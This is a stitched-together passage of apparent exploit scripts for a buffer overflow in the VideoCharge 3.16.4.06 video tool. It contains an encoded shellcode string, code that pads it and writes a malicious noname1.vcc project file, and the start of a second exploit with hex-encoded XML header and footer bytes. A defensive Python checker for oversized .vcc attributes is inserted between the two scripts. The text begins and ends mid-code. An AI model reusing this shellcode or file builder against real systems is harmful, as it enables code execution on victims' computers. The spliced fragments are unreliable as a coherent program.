"\x4c\x4b\x62\x78\x77\x6c\x35\x51\x59\x43\x6c\x4b\x33\x34" +
"\x4c\x4b\x73\x31\x6e\x30\x6b\x39\x72\x64\x44\x64\x75\x74" +
"\x43\x6b\x51\x4b\x65\x31\x52\x79\x62\x7a\x53\x61\x6b\x4f" +
"\x69\x70\x56\x38\x33\x6f\x73\x6a\x4c\x4b\x64\x52\x38\x6b" +
"\x6b\x36\x43\x6d\x51\x7a\x63\x31\x6c\x4d\x6c\x45\x68\x39" +
"\x57\x70\x47\x70\x45\x50\x32\x70\x55\x38\x54\x71\x4e\x6b" +
"\x50\x6f\x6f\x77\x4b\x4f\x59\x45\x6f\x4b\x58\x70\x6c\x75" +
"\x4f\x52\x43\x66\x70\x68\x6e\x46\x6e\x75\x6f\x4d\x4f\x6d" +
"\x4b\x4f\x59\x45\x75\x6c\x47\x76\x33\x4c\x55\x5a\x4d\x50" +
"\x6b\x4b\x59\x70\x64\x35\x73\x35\x6f\x4b\x73\x77\x35\x43" +
"\x64\x32\x62\x4f\x71\x7a\x43\x30\x33\x63\x4b\x4f\x6e\x35" +
"\x62\x43\x73\x51\x32\x4c\x31\x73\x53\x30\x41\x41"
)
payload += "\x41" * (buffersize - len(payload))
sploit = header + payload + footer
print "[*] Creating .vcc file"
try:
    print "[+]Creating Exploit File...\n"
    file = open("noname1.vcc","wb")
    file.write(sploit)
    file.close()
    print "[+]File noname1.vcc created successfully.\n"
except IOError as e:
    print "**[-]Error: %s\n" % e
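The .vcc project files written above carry their payload in the value attribute of the IDX element, padded to 1000 bytes, inside the XML layout spelled out by the header and footer byte strings. As an added example (not part of the original exploits), this Python 3 checker flags any attribute in a .vcc file that exceeds a length bound, and falls back to a raw text sweep when the file is not well-formed XML. The 256-byte bound is an assumption, not a documented VideoCharge limit; the sample files are constructed from the decoded header/footer layout, not produced by the exploit.

```python
"""Length check for VideoCharge .vcc project files (added example)."""
import re
import xml.etree.ElementTree as ET

# Upper bound for one attribute value. Legitimate .vcc fields are paths,
# small integers or short patterns; the exploits above need a 1000-byte
# IDX value. 256 is an assumed bound, not a documented VideoCharge limit.
MAX_ATTR_LEN = 256

_ENCODING_RE = re.compile(rb"""encoding=["']([\w-]+)["']""")
# attr="..." or attr='...'; \2 closes with the same quote that opened.
_ATTR_RE = re.compile(r"""(\w+)\s*=\s*(["'])(.*?)\2""", re.S)


def decode_vcc(data):
    """Decode raw .vcc bytes with the codec named in the XML declaration
    (the files above declare Windows-1251). Unknown or undecodable input
    falls back to latin-1 so every byte sequence still gets scanned."""
    m = _ENCODING_RE.search(data[:200])
    enc = m.group(1).decode("ascii") if m else "utf-8"
    try:
        return data.decode(enc)
    except (LookupError, UnicodeDecodeError):
        return data.decode("latin-1")


def scan_vcc(data, max_len=MAX_ATTR_LEN):
    """Return (element path, attribute, length) for every oversized attribute.

    A well-formed file is parsed so findings carry the element path. A
    file the XML parser rejects (raw bytes such as 0x14 or 0x1c are not
    legal XML characters) is swept with a regex instead, so a malformed
    file cannot hide an oversized field from the check."""
    text = decode_vcc(data)
    findings = []
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        for m in _ATTR_RE.finditer(text):
            if len(m.group(3)) > max_len:
                findings.append(("<unparsed>", m.group(1), len(m.group(3))))
        return findings

    def walk(elem, path):
        here = path + "/" + elem.tag
        for name, value in elem.attrib.items():
            if len(value) > max_len:
                findings.append((here, name, len(value)))
        for child in elem:
            walk(child, here)

    walk(root, "")
    return findings


# Constructed samples that mirror the header/footer layout decoded from
# the byte strings above (not the exploit's output).
_HEAD = (b'<?xml version="1.0" encoding="Windows-1251" ?><Main>\r\n'
         b'<VERSION curver="3.16.4.06"/><FILES>\r\n'
         b"<PathToMediaFile value='C:\\Peach\\sample_mp4' type='8'>\r\n"
         b"<Timelines value='0' type='3'>\r\n</Timelines>\r\n"
         b'<CustomThumbnails enum= "TRUE">\r\n</CustomThumbnails>\r\n'
         b"<IDX value='")
_TAIL = b"' type='8'>\r\n</IDX>\r\n</PathToMediaFile>\r\n</FILES></Main>\r\n"


def sample_vcc(idx_value):
    """Build a minimal .vcc with the given IDX value bytes."""
    return _HEAD + idx_value + _TAIL


BENIGN = sample_vcc(b"01")
OVERSIZED = sample_vcc(b"A" * 1000)   # well-formed, parses, 1000-byte IDX value
# 230 filler bytes, four raw bytes of the kind a packed little-endian
# address produces (0x14 and 0x1c are not XML characters), more filler:
# the XML parse fails and the regex sweep has to catch the field.
MALFORMED = sample_vcc(b"A" * 230 + b"\x14 \x1cx" + b"B" * 700)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("oversized", OVERSIZED),
                        ("malformed", MALFORMED)):
        print(label, scan_vcc(blob))
```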
#!/usr/bin/python
# Exploit Title: VideoCharge v3.16.4.06
# Date: 10/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at] yahoo [dot] com
# Version: 3.16.4.06
# Tested on: Win XP3
# Software link: http://www.softpedia.com/dyn-postdownload.php/36f0ea5a24f3f5f49eb4e12a379b1874/554f2748/a3a/0/1
# Greetz: b33f,corelan,offsec,vulnhub,HUST510, packetstorm
#
# Notes: Copy the file created by the script into the videocharge folder
# All third party modules are SAFESEH'ed
# A bigger buffer of > 1000 & <3000 A's will also crash the program but you'd have to
# use the SEH route which will make for a good exercise since the program only
# ascii printable x-ters and 5c (retn) is a bad x-ter (no push[reg]+ret, jmp[reg] or call[reg] )
#
import struct
header = (
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31"
"\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x57\x69"
"\x6e\x64\x6f\x77\x73\x2d\x31\x32\x35\x31\x22\x20\x3f\x3e\x3c\x4d"
"\x61\x69\x6e\x3e\x0d\x0a\x3c\x56\x45\x52\x53\x49\x4f\x4e\x20\x63"
"\x75\x72\x76\x65\x72\x3d\x22\x33\x2e\x31\x36\x2e\x34\x2e\x30\x36"
"\x22\x2f\x3e\x3c\x46\x49\x4c\x45\x53\x3e\x0d\x0a\x3c\x50\x61\x74"
"\x68\x54\x6f\x4d\x65\x64\x69\x61\x46\x69\x6c\x65\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x43\x3a\x5c\x50\x65\x61\x63\x68\x5c\x73\x61\x6d"
"\x70\x6c\x65\x5f\x6d\x70\x34\x27\x20\x74\x79\x70\x65\x3d\x27\x38"
"\x27\x3e\x0d\x0a\x3c\x54\x69\x6d\x65\x6c\x69\x6e\x65\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x54\x69\x6d\x65\x6c\x69\x6e\x65\x73\x3e"
"\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x54\x68\x75\x6d\x62\x6e\x61"
"\x69\x6c\x73\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x43\x75\x73\x74\x6f\x6d\x54\x68\x75\x6d\x62"
"\x6e\x61\x69\x6c\x73\x3e\x0d\x0a\x3c\x49\x44\x58\x20\x76\x61\x6c"
"\x75\x65\x3d\x27"
)
footer = (
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x49"
"\x44\x58\x3e\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x50\x61\x74\x74"
"\x65\x72\x6e\x4e\x61\x6d\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x46\x4f\x52"
"\x4d\x41\x54\x5f\x69\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32"
"\x64\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f"
"\x46\x4f\x52\x4d\x41\x54\x5f\x69\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d"
"\x41\x54\x5f\x74\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46"
"\x4f\x52\x4d\x41\x54\x5f\x74\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41"
"\x54\x5f\x66\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f"
"\x52\x4d\x41\x54\x5f\x66\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54"
"\x5f\x78\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52"
"\x4d\x41\x54\x5f\x78\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f"
"\x79\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d"
"\x41\x54\x5f\x79\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x72"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41"
"\x54\x5f\x72\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x67\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54"
"\x5f\x67\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x63\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f"
"\x63\x3e\x0d\x0a\x3c\x52\x61\x6e\x67\x65\x5f\x63\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x52\x61\x6e\x67\x65\x5f\x63\x3e\x0d\x0a\x3c\x2f"
"\x43\x75\x73\x74\x6f\x6d\x50\x61\x74\x74\x65\x72\x6e\x4e\x61\x6d"
"\x65\x3e\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x46\x6f\x6c\x64\x65"
"\x72\x20\x76\x61\x6c\x75\x65\x3d\x27\x27\x20\x74\x79\x70\x65\x3d"
"\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x43\x75\x73\x74\x6f\x6d\x46\x6f"
"\x6c\x64\x65\x72\x3e\x0d\x0a\x3c\x53\x6b\x69\x70\x52\x61\x6e\x67"
"\x65\x45\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55"
"\x45\x22\x3e\x0d\x0a\x3c\x2f\x53\x6b\x69\x70\x52\x61\x6e\x67\x65"
"\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x49\x74\x65"
"\x6d\x45\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55"
"\x45\x22\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x49\x74\x65\x6d"
"\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x41\x75\x64\x69\x6f\x53\x74\x72"
"\x65\x61\x6d\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x41\x75\x64\x69\x6f"
"\x53\x74\x72\x65\x61\x6d\x3e\x0d\x0a\x3c\x49\x6e\x63\x6c\x75\x64"
"\x65\x43\x68\x61\x70\x74\x65\x72\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x49\x6e\x63\x6c\x75\x64\x65\x43\x68\x61\x70\x74\x65\x72\x3e\x0d"
"\x0a\x3c\x55\x73\x65\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x73\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27"
"\x33\x27\x3e\x0d\x0a\x3c\x2f\x55\x73\x65\x53\x75\x62\x46\x6f\x6c"
"\x64\x65\x72\x73\x3e\x0d\x0a\x3c\x2f\x50\x61\x74\x68\x54\x6f\x4d"
"\x65\x64\x69\x61\x46\x69\x6c\x65\x3e\x0d\x0a\x3c\x2f\x46\x49\x4c"
"\x45\x53\x3e\x0d\x0a\x3c\x43\x6f\x6d\x6d\x6f\x6e\x3e\x0d\x0a\x3c"
"\x4f\x75\x74\x70\x75\x74\x3e\x0d\x0a\x3c\x4d\x6f\x64\x65\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x4f\x75"
"\x74\x70\x75\x74\x4d\x65\x64\x69\x61\x4e\x61\x6d\x65\x20\x76\x61"
"\x6c\x75\x65\x3d\x27\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e"
"\x0d\x0a\x3c\x2f\x4f\x75\x74\x70\x75\x74\x4d\x65\x64\x69\x61\x4e"
"\x61\x6d\x65\x3e\x0d\x0a\x3c\x44\x65\x73\x74\x69\x6e\x61\x74\x69"
"\x6f\x6e\x50\x61\x74\x68\x20\x76\x61\x6c\x75\x65\x3d\x27\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x44\x65\x73"
"\x74\x69\x6e\x61\x74\x69\x6f\x6e\x50\x61\x74\x68\x3e\x0d\x0a\x3c"
"\x46\x69\x6c\x65\x4e\x61\x6d\x65\x50\x61\x74\x74\x65\x72\x6e\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x25\x73\x5f\x63\x6f\x70\x79\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d"
"\x41\x54\x5f\x69\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46"
"\x4f\x52\x4d\x41\x54\x5f\x69\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41"
"\x54\x5f\x74\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f"
"\x52\x4d\x41\x54\x5f\x74\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54"
"\x5f\x66\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52"
"\x4d\x41\x54\x5f\x66\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f"
"\x78\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d"
"\x41\x54\x5f\x78\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x79"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41"
"\x54\x5f\x79\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x72\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54"
"\x5f\x72\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x67\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f"
"\x67\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x63\x20\x76\x61"
"\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65\x3d"
"\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f\x63"
"\x3e\x0d\x0a\x3c\x52\x61\x6e\x67\x65\x5f\x63\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x61\x6e\x67\x65\x5f\x63\x3e\x0d\x0a\x3c\x2f\x46"
"\x69\x6c\x65\x4e\x61\x6d\x65\x50\x61\x74\x74\x65\x72\x6e\x3e\x0d"
"\x0a\x3c\x49\x73\x53\x70\x6c\x69\x74\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x53\x70\x6c\x69\x74\x54\x79\x70\x65\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x2f\x53\x70\x6c\x69\x74\x54\x79\x70\x65\x3e\x0d\x0a\x3c\x53\x70"
"\x6c\x69\x74\x4c\x65\x6e\x67\x74\x68\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x31\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78"
"\x74\x3d\x27\x31\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x4c\x65\x6e\x67\x74"
"\x68\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x42\x79\x53\x69\x7a\x65"
"\x4d\x6f\x64\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69"
"\x74\x42\x79\x53\x69\x7a\x65\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x53"
"\x70\x6c\x69\x74\x43\x6f\x75\x6e\x74\x50\x61\x72\x74\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x43\x6f\x75\x6e\x74"
"\x50\x61\x72\x74\x73\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x4d\x61"
"\x78\x53\x69\x7a\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x36\x30\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78\x74\x3d\x27"
"\x31\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x4d\x61\x78\x53\x69\x7a\x65\x3e"
"\x0d\x0a\x3c\x45\x78\x61\x63\x74\x6c\x79\x20\x76\x61\x6c\x75\x65"
"\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a"
"\x3c\x2f\x45\x78\x61\x63\x74\x6c\x79\x3e\x0d\x0a\x3c\x2f\x49\x73"
"\x53\x70\x6c\x69\x74\x3e\x0d\x0a\x3c\x4a\x6f\x69\x6e\x53\x75\x62"
"\x54\x69\x6d\x65\x4c\x69\x6e\x65\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x4a\x6f\x69\x6e\x53\x75\x62\x54\x69\x6d\x65\x4c\x69\x6e\x65\x3e"
"\x0d\x0a\x3c\x4f\x76\x65\x72\x77\x72\x69\x74\x65\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x4f\x76\x65\x72\x77\x72\x69\x74\x65\x3e\x0d\x0a"
"\x3c\x54\x68\x75\x6d\x62\x4f\x6e\x6c\x79\x20\x76\x61\x6c\x75\x65"
"\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a"
"\x3c\x2f\x54\x68\x75\x6d\x62\x4f\x6e\x6c\x79\x3e\x0d\x0a\x3c\x2f"
"\x4f\x75\x74\x70\x75\x74\x3e\x0d\x0a\x3c\x41\x63\x74\x69\x6f\x6e"
"\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72"
"\x61\x6d\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x41\x63\x74\x69\x6f\x6e"
"\x52\x6f\x6f\x74\x5f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46"
"\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69"
"\x76\x65\x46\x72\x61\x6d\x65\x41\x63\x74\x69\x6f\x6e\x49\x6e\x73"
"\x65\x72\x74\x45\x76\x65\x72\x79\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x32\x35\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x2f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65"
"\x41\x63\x74\x69\x6f\x6e\x49\x6e\x73\x65\x72\x74\x45\x76\x65\x72"
"\x79\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46"
"\x72\x61\x6d\x65\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x77\x65"
"\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65\x45\x6e\x75\x6d"
"\x3e\x0d\x0a\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x52\x6f\x6f\x74\x5f"
"\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65\x3e"
"\x0d\x0a\x3c\x2f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72"
"\x61\x6d\x65\x3e\x0d\x0a\x3c\x54\x68\x75\x6d\x62\x6e\x61\x69\x6c"
"\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x54\x68\x75\x6d\x62\x6e\x61\x69"
"\x6c\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d\x62\x6e"
"\x61\x69\x6c\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d"
"\x62\x6e\x61\x69\x6c\x73\x3e\x0d\x0a\x3c\x2f\x41\x63\x74\x69\x6f"
"\x6e\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6d\x6d\x6f\x6e\x3e\x0d\x0a\x3c"
"\x4f\x75\x74\x70\x75\x74\x46\x69\x6c\x65\x46\x6f\x72\x6d\x61\x74"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x7b\x31\x41\x44\x43\x33\x33\x42"
"\x39\x2d\x35\x39\x36\x44\x2d\x34\x33\x30\x43\x2d\x42\x35\x39\x41"
"\x2d\x36\x44\x37\x37\x41\x42\x43\x42\x35\x46\x44\x39\x7d\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x37\x32\x27\x3e\x0d\x0a\x3c\x47\x49\x46"
"\x41\x3e\x0d\x0a\x3c\x4d\x61\x69\x6e\x3e\x0d\x0a\x3c\x50\x61\x6c"
"\x65\x74\x74\x65\x44\x65\x73\x63\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f"
"\x72\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x38\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f\x72\x73"
"\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f\x72\x4d\x61\x70\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f\x72\x4d\x61\x70\x3e\x0d\x0a\x3c"
"\x2f\x50\x61\x6c\x65\x74\x74\x65\x44\x65\x73\x63\x3e\x0d\x0a\x3c"
"\x41\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x3c\x46\x72\x61"
"\x6d\x65\x44\x65\x6c\x61\x79\x20\x76\x61\x6c\x75\x65\x3d\x27\x31"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78\x74\x3d\x27"
"\x31\x30\x6d\x73\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x38"
"\x27\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x44\x65\x6c\x61\x79"
"\x3e\x0d\x0a\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x43\x6f\x75\x6e\x74\x52\x65\x70\x65\x74\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27"
"\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x75\x6e\x74\x52\x65\x70\x65"
"\x74\x3e\x0d\x0a\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e"
"\x3e\x0d\x0a\x3c\x2f\x41\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x3e\x0d"
"\x0a\x3c\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61\x6d\x65"
"\x3e\x0d\x0a\x3c\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61"
"\x6d\x65\x54\x79\x70\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x43\x6f\x75"
"\x6e\x74\x53\x6b\x69\x70\x20\x76\x61\x6c\x75\x65\x3d\x27\x31\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43"
"\x6f\x75\x6e\x74\x53\x6b\x69\x70\x3e\x0d\x0a\x3c\x46\x72\x61\x6d"
"\x65\x50\x61\x74\x74\x65\x72\x6e\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x3b\x35\x3b\x37\x3b\x32\x35\x3b\x33\x32\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x50"
"\x61\x74\x74\x65\x72\x6e\x3e\x0d\x0a\x3c\x2f\x53\x6f\x75\x72\x63"
"\x65\x47\x69\x66\x46\x72\x61\x6d\x65\x54\x79\x70\x65\x3e\x0d\x0a"
"\x3c\x53\x6f\x75\x72\x63\x65\x43\x6f\x75\x6e\x74\x46\x72\x61\x6d"
"\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x43\x6f\x75\x6e\x74\x46\x72\x61"
"\x6d\x65\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x75\x6e\x74"
"\x46\x72\x61\x6d\x65\x73\x3e\x0d\x0a\x3c\x2f\x53\x6f\x75\x72\x63"
"\x65\x43\x6f\x75\x6e\x74\x46\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x2f"
"\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61\x6d\x65\x3e\x0d"
"\x0a\x3c\x2f\x4d\x61\x69\x6e\x3e\x0d\x0a\x3c\x46\x72\x61\x6d\x65"
"\x3e\x0d\x0a\x3c\x4c\x69\x66\x65\x54\x69\x6d\x65\x46\x69\x6c\x74"
